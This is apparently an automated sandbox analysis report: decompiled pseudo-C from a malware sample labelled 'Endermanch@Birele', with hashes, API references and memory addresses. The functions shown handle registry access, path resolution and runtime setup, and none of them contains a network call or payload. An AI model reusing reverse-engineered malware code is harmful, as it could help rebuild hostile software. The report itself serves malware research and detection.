                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00415519() {
                                                                                                                                                  				long _t7;
                                                                                                                                                  				void* _t9;
                                                                                                                                                  
                                                                                                                                                  				E004151F0( *((intOrPtr*)(_t9 - 4)),  *((intOrPtr*)(_t9 - 0x18)));
                                                                                                                                                  				_t7 = RegCloseKey( *(_t9 - 0x1c)); // executed
                                                                                                                                                  				return _t7;
                                                                                                                                                  			}





                                                                                                                                                  0x00415505
                                                                                                                                                  0x0041550e
                                                                                                                                                  0x00415513

                                                                                                                                                  APIs
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,0041551B,00000000,0041555D), ref: 0041550E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  • Opcode ID: b4c422e474a5f38b5842ab7dac326bb470f1e50f44f6a73a73a9026f168c3500
                                                                                                                                                  • Instruction ID: 6f43521391a9dfed9570ded51f65e1e9e926f8e3cfe4b526732f07f7c56793f1
                                                                                                                                                  • Opcode Fuzzy Hash: b4c422e474a5f38b5842ab7dac326bb470f1e50f44f6a73a73a9026f168c3500
                                                                                                                                                  • Instruction Fuzzy Hash: 10C04C74D00505EBCF00EB99C4469EF7374AB88314BD04956A515A3101C63DAD855B94
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00415C6C() {
                                                                                                                                                  				long _t3;
                                                                                                                                                  				void* _t4;
                                                                                                                                                  
                                                                                                                                                  				_t3 = RegCloseKey( *(_t4 - 0x24)); // executed
                                                                                                                                                  				return _t3;
                                                                                                                                                  			}





                                                                                                                                                  0x00415c61
                                                                                                                                                  0x00415c66

                                                                                                                                                  APIs
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00415C6E,00000000,00415C8A,?,00000000,00415CA8,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00415C61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  • Opcode ID: 7c91f4545401d51c88c786edccc3c1c4797f8067341a0bac21c0f15ec479098c
                                                                                                                                                  • Instruction ID: 61b5526057950a7de15b5d5c439d35017df66950e57150426ceb1a10c44fc0e9
                                                                                                                                                  • Opcode Fuzzy Hash: 7c91f4545401d51c88c786edccc3c1c4797f8067341a0bac21c0f15ec479098c
                                                                                                                                                  • Instruction Fuzzy Hash: D4A02238A00B00EBCF00EFE080088EE22A8AA8C3003E00C82F008F2000E03FEE020A28
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                                  			E00415878(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                  				char _v21;
                                                                                                                                                  				void* _t50;
                                                                                                                                                  				void* _t67;
                                                                                                                                                  				intOrPtr _t84;
                                                                                                                                                  				intOrPtr _t89;
                                                                                                                                                  				void* _t92;
                                                                                                                                                  				void* _t94;
                                                                                                                                                  				void* _t95;
                                                                                                                                                  				intOrPtr _t96;
                                                                                                                                                  
                                                                                                                                                  				_t94 = _t95;
                                                                                                                                                  				_t96 = _t95 + 0xffffffec;
                                                                                                                                                  				_t92 = __ecx;
                                                                                                                                                  				_v8 = __edx;
                                                                                                                                                  				_v12 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 4));
                                                                                                                                                  				E004151F0( *((intOrPtr*)(_a4 - 4)), __eax);
                                                                                                                                                  				_push(_t94);
                                                                                                                                                  				_push(0x41598a);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t96;
                                                                                                                                                  				_t67 = E00415644( *((intOrPtr*)(_a4 - 4)), __ecx, __eflags);
                                                                                                                                                  				_t98 = _t67;
                                                                                                                                                  				if(_t67 <= 0) {
                                                                                                                                                  					__eflags = 0;
                                                                                                                                                  					_pop(_t84);
                                                                                                                                                  					 *[fs:eax] = _t84;
                                                                                                                                                  					_push(E00415991);
                                                                                                                                                  					return E004151F0( *((intOrPtr*)(_a4 - 4)), _v12);
                                                                                                                                                  				} else {
                                                                                                                                                  					_v20 = E00409720(_t67, _t98);
                                                                                                                                                  					_push(_t94);
                                                                                                                                                  					_push(0x415967);
                                                                                                                                                  					_push( *[fs:eax]);
                                                                                                                                                  					 *[fs:eax] = _t96;
                                                                                                                                                  					_t50 = E00415700( *((intOrPtr*)(_a4 - 4)), _v20, _t92,  &_v21, _t67); // executed
                                                                                                                                                  					_v16 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 4));
                                                                                                                                                  					E004151F0( *((intOrPtr*)(_a4 - 4)), _v8);
                                                                                                                                                  					_push(_t94);
                                                                                                                                                  					_push(0x41594a);
                                                                                                                                                  					_push( *[fs:eax]);
                                                                                                                                                  					 *[fs:eax] = _t96;
                                                                                                                                                  					E00415698( *((intOrPtr*)(_a4 - 4)), _v20, _t92, _t98, 0, _t50); // executed
                                                                                                                                                  					_pop(_t89);
                                                                                                                                                  					 *[fs:eax] = _t89;
                                                                                                                                                  					_push(E00415951);
                                                                                                                                                  					return E004151F0( *((intOrPtr*)(_a4 - 4)), _v16);
                                                                                                                                                  				}
                                                                                                                                                  			}
















                                                                                                                                                  0x00415879
                                                                                                                                                  0x0041587b
                                                                                                                                                  0x00415880
                                                                                                                                                  0x00415882
                                                                                                                                                  0x0041588e
                                                                                                                                                  0x00415898
                                                                                                                                                  0x0041589f
                                                                                                                                                  0x004158a0
                                                                                                                                                  0x004158a5
                                                                                                                                                  0x004158a8
                                                                                                                                                  0x004158b8
                                                                                                                                                  0x004158ba
                                                                                                                                                  0x004158bc
                                                                                                                                                  0x0041596e
                                                                                                                                                  0x00415970
                                                                                                                                                  0x00415973
                                                                                                                                                  0x00415976
                                                                                                                                                  0x00415989
                                                                                                                                                  0x004158c2
                                                                                                                                                  0x004158c9
                                                                                                                                                  0x004158ce
                                                                                                                                                  0x004158cf
                                                                                                                                                  0x004158d4
                                                                                                                                                  0x004158d7
                                                                                                                                                  0x004158ea
                                                                                                                                                  0x004158fa
                                                                                                                                                  0x00415906
                                                                                                                                                  0x0041590d
                                                                                                                                                  0x0041590e
                                                                                                                                                  0x00415913
                                                                                                                                                  0x00415916
                                                                                                                                                  0x00415929
                                                                                                                                                  0x00415930
                                                                                                                                                  0x00415933
                                                                                                                                                  0x00415936
                                                                                                                                                  0x00415949
                                                                                                                                                  0x00415949

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Value$Query
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4255345937-0
                                                                                                                                                  • Opcode ID: 3b7714f68e251e3fedeaa7c8efeb0d66ef19a9b3d83813ead7222de35bf33433
                                                                                                                                                  • Instruction ID: aa29b8fc898220e5a21962ed39db224a6223b180fe3c3ef9623e4e14b483a44e
                                                                                                                                                  • Opcode Fuzzy Hash: 3b7714f68e251e3fedeaa7c8efeb0d66ef19a9b3d83813ead7222de35bf33433
                                                                                                                                                  • Instruction Fuzzy Hash: 373149B8710A08EFC701DF59C8958DEBBF9EB8C720B5185A6F8449B311D738EE41CA94
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 31ae8cb3ff25d1a0ae920620ab36e550f4024e133711e052186b9dc977e7af5d
                                                                                                                                                  • Instruction ID: baba3774e5db9170fcae5dab086b75067e711751db4508beddb64815688ff0af
                                                                                                                                                  • Opcode Fuzzy Hash: 31ae8cb3ff25d1a0ae920620ab36e550f4024e133711e052186b9dc977e7af5d
                                                                                                                                                  • Instruction Fuzzy Hash: 79F052B22006016FD3218F4FAED1863BF9CF789320305883BF408E37A0CA76AD10D968
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0041566C(void* __eax, void* __ecx, void* __edx) {
                                                                                                                                                  				void* _t8;
                                                                                                                                                  				void* _t9;
                                                                                                                                                  
                                                                                                                                                  				_t9 = __eax;
                                                                                                                                                  				_t4 = E00403C48(__ecx) + 1;
                                                                                                                                                  				_t8 = E00415698(_t9, E00403E38(__ecx), __edx, E00403C48(__ecx) + 1, 1, _t4); // executed
                                                                                                                                                  				return _t8;
                                                                                                                                                  			}





                                                                                                                                                  0x00415673
                                                                                                                                                  0x0041567c
                                                                                                                                                  0x0041568d
                                                                                                                                                  0x00415695

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Value
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                  • Opcode ID: e83d0740145b18ed4bbaef337b443c8d04dc3b66f0d1e0c42e1018c2eb65bab3
                                                                                                                                                  • Instruction ID: 35edae831e217ae032e83d6b7b8a5c73fe710539674c7efb9bbfab6b49e64099
                                                                                                                                                  • Opcode Fuzzy Hash: e83d0740145b18ed4bbaef337b443c8d04dc3b66f0d1e0c42e1018c2eb65bab3
                                                                                                                                                  • Instruction Fuzzy Hash: 55D0C9623016202BA204656F1C41AAE85CD8BC9A6A754003BB50DE7392DDA98D4602A8
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                  			E004083E0(void* __eax) {
                                                                                                                                                  
                                                                                                                                                  				asm("jecxz 0x4");
                                                                                                                                                  				return  *((intOrPtr*)(__eax + 0x1c));
                                                                                                                                                  			}



                                                                                                                                                  0x004083e3
                                                                                                                                                  0x004083e6

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 90056a2d105b484e4b62bf6eae47fac5bd9bb627b31bc4d49509141f827bb4b7
                                                                                                                                                  • Instruction ID: 20e76f15aff949347372c085140b88abdc78033378d7e2a1b7db157466d2375d
                                                                                                                                                  • Opcode Fuzzy Hash: 90056a2d105b484e4b62bf6eae47fac5bd9bb627b31bc4d49509141f827bb4b7
                                                                                                                                                  • Instruction Fuzzy Hash: E4D0C23020854102DB85AB29C4C06072A846F90319B4044FEA8826B2C3CFBCC442AB09
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                  			E00402638(void* __eax) {
                                                                                                                                                  				void* _t3;
                                                                                                                                                  				void* _t6;
                                                                                                                                                  
                                                                                                                                                  				if(__eax <= 0) {
                                                                                                                                                  					_t6 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t3 =  *0x41803c(); // executed
                                                                                                                                                  					_t6 = _t3;
                                                                                                                                                  					if(_t6 == 0) {
                                                                                                                                                  						E00402720(1);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t6;
                                                                                                                                                  			}





                                                                                                                                                  0x0040263b
                                                                                                                                                  0x00402652
                                                                                                                                                  0x0040263d
                                                                                                                                                  0x0040263d
                                                                                                                                                  0x00402643
                                                                                                                                                  0x00402647
                                                                                                                                                  0x0040264b
                                                                                                                                                  0x0040264b
                                                                                                                                                  0x00402647
                                                                                                                                                  0x00402657

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 33ebc5f31b1035feecc87c6896fb90885c8dc0f5c9fcac9c4b338f4b41c03924
                                                                                                                                                  • Instruction ID: 1058be6bf19a490c087f8d279ed9db65ed44d515ba0b49c3e4970b41d5a761d7
                                                                                                                                                  • Opcode Fuzzy Hash: 33ebc5f31b1035feecc87c6896fb90885c8dc0f5c9fcac9c4b338f4b41c03924
                                                                                                                                                  • Instruction Fuzzy Hash: 43C08CB03013138B9B003EEA0BEC01351882B38284700087FAD04E23C2DEFAC80E663A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 16%
                                                                                                                                                  			E00406250(intOrPtr* __eax) {
                                                                                                                                                  				void* _t5;
                                                                                                                                                  
                                                                                                                                                  				asm("jecxz 0xc");
                                                                                                                                                  				_push( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x44)) + 0x1c)));
                                                                                                                                                  				asm("lodsd"); // executed
                                                                                                                                                  				_t5 = E00405EB8(__eax); // executed
                                                                                                                                                  				asm("loop 0xfffffff8");
                                                                                                                                                  				return _t5;
                                                                                                                                                  			}




                                                                                                                                                  0x0040625a
                                                                                                                                                  0x0040625c
                                                                                                                                                  0x0040625d
                                                                                                                                                  0x0040625e
                                                                                                                                                  0x00406264
                                                                                                                                                  0x00406267

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9adaa953d2fb6ffaa2adea4b28e2ca628e519e7a798391335b37bc44be81126c
                                                                                                                                                  • Instruction ID: 8839e98bfc74b6f14d3acc62b2fc79103dca72dfbcbd23ff51be8a489eebff5a
                                                                                                                                                  • Opcode Fuzzy Hash: 9adaa953d2fb6ffaa2adea4b28e2ca628e519e7a798391335b37bc44be81126c
                                                                                                                                                  • Instruction Fuzzy Hash: E5C012368089208BCA24BE00A00089373A89A443203460AEFA8433B3A18934BD818AD9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040675C(void* __eax, void* __edx) {
                                                                                                                                                  				void* _t7;
                                                                                                                                                  
                                                                                                                                                  				_t7 = __eax;
                                                                                                                                                  				if(__edx == 0) {
                                                                                                                                                  					 *((intOrPtr*)(__eax + 0x6c)) = 0x405c44;
                                                                                                                                                  				} else {
                                                                                                                                                  					 *((intOrPtr*)(__eax + 0x6c)) = E00406520;
                                                                                                                                                  					E00407668(__eax); // executed
                                                                                                                                                  				}
                                                                                                                                                  				return _t7;
                                                                                                                                                  			}




                                                                                                                                                  0x0040675d
                                                                                                                                                  0x00406761
                                                                                                                                                  0x00406773
                                                                                                                                                  0x00406763
                                                                                                                                                  0x00406763
                                                                                                                                                  0x0040676c
                                                                                                                                                  0x0040676c
                                                                                                                                                  0x0040677d

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 25da475608c9d6fd49277d8d03256b60ac927d89219a6e8d567fe6741888ceee
                                                                                                                                                  • Instruction ID: 423c99772fe2ad1ba25f4678ec601e2d52d324344adf6e1a132a318e02234cac
                                                                                                                                                  • Opcode Fuzzy Hash: 25da475608c9d6fd49277d8d03256b60ac927d89219a6e8d567fe6741888ceee
                                                                                                                                                  • Instruction Fuzzy Hash: 25C0127520970146DB005E2918C09022A54960035C311807B64026F38AC37EC8189F4D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00403718(intOrPtr __eax, intOrPtr __edx) {
                                                                                                                                                  				void* _t6;
                                                                                                                                                  				intOrPtr _t7;
                                                                                                                                                  
                                                                                                                                                  				_t7 = __edx;
                                                                                                                                                  				 *0x419014 = 0x401168;
                                                                                                                                                  				 *0x419018 = 0x401170;
                                                                                                                                                  				 *0x419638 = __eax;
                                                                                                                                                  				 *0x41963c = 0;
                                                                                                                                                  				 *0x419640 = __edx;
                                                                                                                                                  				_t1 = _t7 + 4; // 0x400000
                                                                                                                                                  				 *0x41902c =  *_t1;
                                                                                                                                                  				E00403610();
                                                                                                                                                  				 *0x419034 = 0; // executed
                                                                                                                                                  				_t6 = E004036B8(); // executed
                                                                                                                                                  				return _t6;
                                                                                                                                                  			}





                                                                                                                                                  0x00403718
                                                                                                                                                  0x00403718
                                                                                                                                                  0x00403722
                                                                                                                                                  0x0040372c
                                                                                                                                                  0x00403733
                                                                                                                                                  0x00403738
                                                                                                                                                  0x0040373e
                                                                                                                                                  0x00403741
                                                                                                                                                  0x00403746
                                                                                                                                                  0x0040374b
                                                                                                                                                  0x00403752
                                                                                                                                                  0x00403757

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a01a9f2854f1b41ece7997731a594c06cffd82828fc5eeb8b6439c4a01c67717
                                                                                                                                                  • Instruction ID: 17366c64c2580302be042c683cb77b59e5dce16d6f5a0bf814aac77971e7d171
                                                                                                                                                  • Opcode Fuzzy Hash: a01a9f2854f1b41ece7997731a594c06cffd82828fc5eeb8b6439c4a01c67717
                                                                                                                                                  • Instruction Fuzzy Hash: 7CE0E2B48012008EC714EF76AAA42817FE0A70C304B41C97AD1089B371D3388E44CFAD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                                  			E004048F8(char* __eax, intOrPtr __edx) {
                                                                                                                                                  				char* _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				struct _WIN32_FIND_DATAA _v334;
                                                                                                                                                  				char _v595;
                                                                                                                                                  				void* _t45;
                                                                                                                                                  				char* _t54;
                                                                                                                                                  				char* _t64;
                                                                                                                                                  				void* _t83;
                                                                                                                                                  				intOrPtr* _t84;
                                                                                                                                                  				char* _t90;
                                                                                                                                                  				struct HINSTANCE__* _t91;
                                                                                                                                                  				char* _t93;
                                                                                                                                                  				void* _t94;
                                                                                                                                                  				char* _t95;
                                                                                                                                                  				void* _t96;
                                                                                                                                                  
                                                                                                                                                  				_v12 = __edx;
                                                                                                                                                  				_v8 = __eax;
                                                                                                                                                  				_v16 = _v8;
                                                                                                                                                  				_t91 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                  				if(_t91 == 0) {
                                                                                                                                                  					L4:
                                                                                                                                                  					if( *_v8 != 0x5c) {
                                                                                                                                                  						_t93 = _v8 + 2;
                                                                                                                                                  						goto L10;
                                                                                                                                                  					} else {
                                                                                                                                                  						if( *((char*)(_v8 + 1)) == 0x5c) {
                                                                                                                                                  							_t95 = E004048E4(_v8 + 2);
                                                                                                                                                  							if( *_t95 != 0) {
                                                                                                                                                  								_t14 = _t95 + 1; // 0x1
                                                                                                                                                  								_t93 = E004048E4(_t14);
                                                                                                                                                  								if( *_t93 != 0) {
                                                                                                                                                  									L10:
                                                                                                                                                  									_t83 = _t93 - _v8;
                                                                                                                                                  									_push(_t83 + 1);
                                                                                                                                                  									_push(_v8);
                                                                                                                                                  									_push( &_v595);
                                                                                                                                                  									L00401200();
                                                                                                                                                  									while( *_t93 != 0) {
                                                                                                                                                  										_t90 = E004048E4(_t93 + 1);
                                                                                                                                                  										_t45 = _t90 - _t93;
                                                                                                                                                  										if(_t45 + _t83 + 1 <= 0x105) {
                                                                                                                                                  											_push(_t45 + 1);
                                                                                                                                                  											_push(_t93);
                                                                                                                                                  											_push( &(( &_v595)[_t83]));
                                                                                                                                                  											L00401200();
                                                                                                                                                  											_t94 = FindFirstFileA( &_v595,  &_v334);
                                                                                                                                                  											if(_t94 != 0xffffffff) {
                                                                                                                                                  												FindClose(_t94);
                                                                                                                                                  												_t54 =  &(_v334.cFileName);
                                                                                                                                                  												_push(_t54);
                                                                                                                                                  												L00401208();
                                                                                                                                                  												if(_t54 + _t83 + 1 + 1 <= 0x105) {
                                                                                                                                                  													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                                                                                                                                                  													_push(0x105 - _t83 - 1);
                                                                                                                                                  													_push( &(_v334.cFileName));
                                                                                                                                                  													_push( &(( &(( &_v595)[_t83]))[1]));
                                                                                                                                                  													L00401200();
                                                                                                                                                  													_t64 =  &(_v334.cFileName);
                                                                                                                                                  													_push(_t64);
                                                                                                                                                  													L00401208();
                                                                                                                                                  													_t83 = _t83 + _t64 + 1;
                                                                                                                                                  													_t93 = _t90;
                                                                                                                                                  													continue;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										goto L17;
                                                                                                                                                  									}
                                                                                                                                                  									_push(_v12);
                                                                                                                                                  									_push( &_v595);
                                                                                                                                                  									_push(_v8);
                                                                                                                                                  									L00401200();
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
                                                                                                                                                  					if(_t84 == 0) {
                                                                                                                                                  						goto L4;
                                                                                                                                                  					} else {
                                                                                                                                                  						_push(0x105);
                                                                                                                                                  						_push( &_v595);
                                                                                                                                                  						_push(_v8);
                                                                                                                                                  						if( *_t84() == 0) {
                                                                                                                                                  							goto L4;
                                                                                                                                                  						} else {
                                                                                                                                                  							_push(_v12);
                                                                                                                                                  							_push( &_v595);
                                                                                                                                                  							_push(_v8);
                                                                                                                                                  							L00401200();
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				L17:
                                                                                                                                                  				return _v16;
                                                                                                                                                  			}



















                                                                                                                                                  0x00404904
                                                                                                                                                  0x00404907
                                                                                                                                                  0x0040490d
                                                                                                                                                  0x0040491a
                                                                                                                                                  0x0040491e
                                                                                                                                                  0x00404960
                                                                                                                                                  0x00404966
                                                                                                                                                  0x004049a3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404968
                                                                                                                                                  0x0040496f
                                                                                                                                                  0x00404980
                                                                                                                                                  0x00404985
                                                                                                                                                  0x0040498b
                                                                                                                                                  0x00404993
                                                                                                                                                  0x00404998
                                                                                                                                                  0x004049a6
                                                                                                                                                  0x004049a8
                                                                                                                                                  0x004049ae
                                                                                                                                                  0x004049b2
                                                                                                                                                  0x004049b9
                                                                                                                                                  0x004049ba
                                                                                                                                                  0x00404a65
                                                                                                                                                  0x004049cc
                                                                                                                                                  0x004049d0
                                                                                                                                                  0x004049dd
                                                                                                                                                  0x004049e4
                                                                                                                                                  0x004049e5
                                                                                                                                                  0x004049ee
                                                                                                                                                  0x004049ef
                                                                                                                                                  0x00404a07
                                                                                                                                                  0x00404a0c
                                                                                                                                                  0x00404a0f
                                                                                                                                                  0x00404a14
                                                                                                                                                  0x00404a1a
                                                                                                                                                  0x00404a1b
                                                                                                                                                  0x00404a2b
                                                                                                                                                  0x00404a2d
                                                                                                                                                  0x00404a3d
                                                                                                                                                  0x00404a44
                                                                                                                                                  0x00404a4e
                                                                                                                                                  0x00404a4f
                                                                                                                                                  0x00404a54
                                                                                                                                                  0x00404a5a
                                                                                                                                                  0x00404a5b
                                                                                                                                                  0x00404a61
                                                                                                                                                  0x00404a63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404a63
                                                                                                                                                  0x00404a2b
                                                                                                                                                  0x00404a0c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004049dd
                                                                                                                                                  0x00404a71
                                                                                                                                                  0x00404a78
                                                                                                                                                  0x00404a7c
                                                                                                                                                  0x00404a7d
                                                                                                                                                  0x00404a7d
                                                                                                                                                  0x00404998
                                                                                                                                                  0x00404985
                                                                                                                                                  0x0040496f
                                                                                                                                                  0x00404920
                                                                                                                                                  0x0040492b
                                                                                                                                                  0x0040492f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404931
                                                                                                                                                  0x00404931
                                                                                                                                                  0x0040493c
                                                                                                                                                  0x00404940
                                                                                                                                                  0x00404945
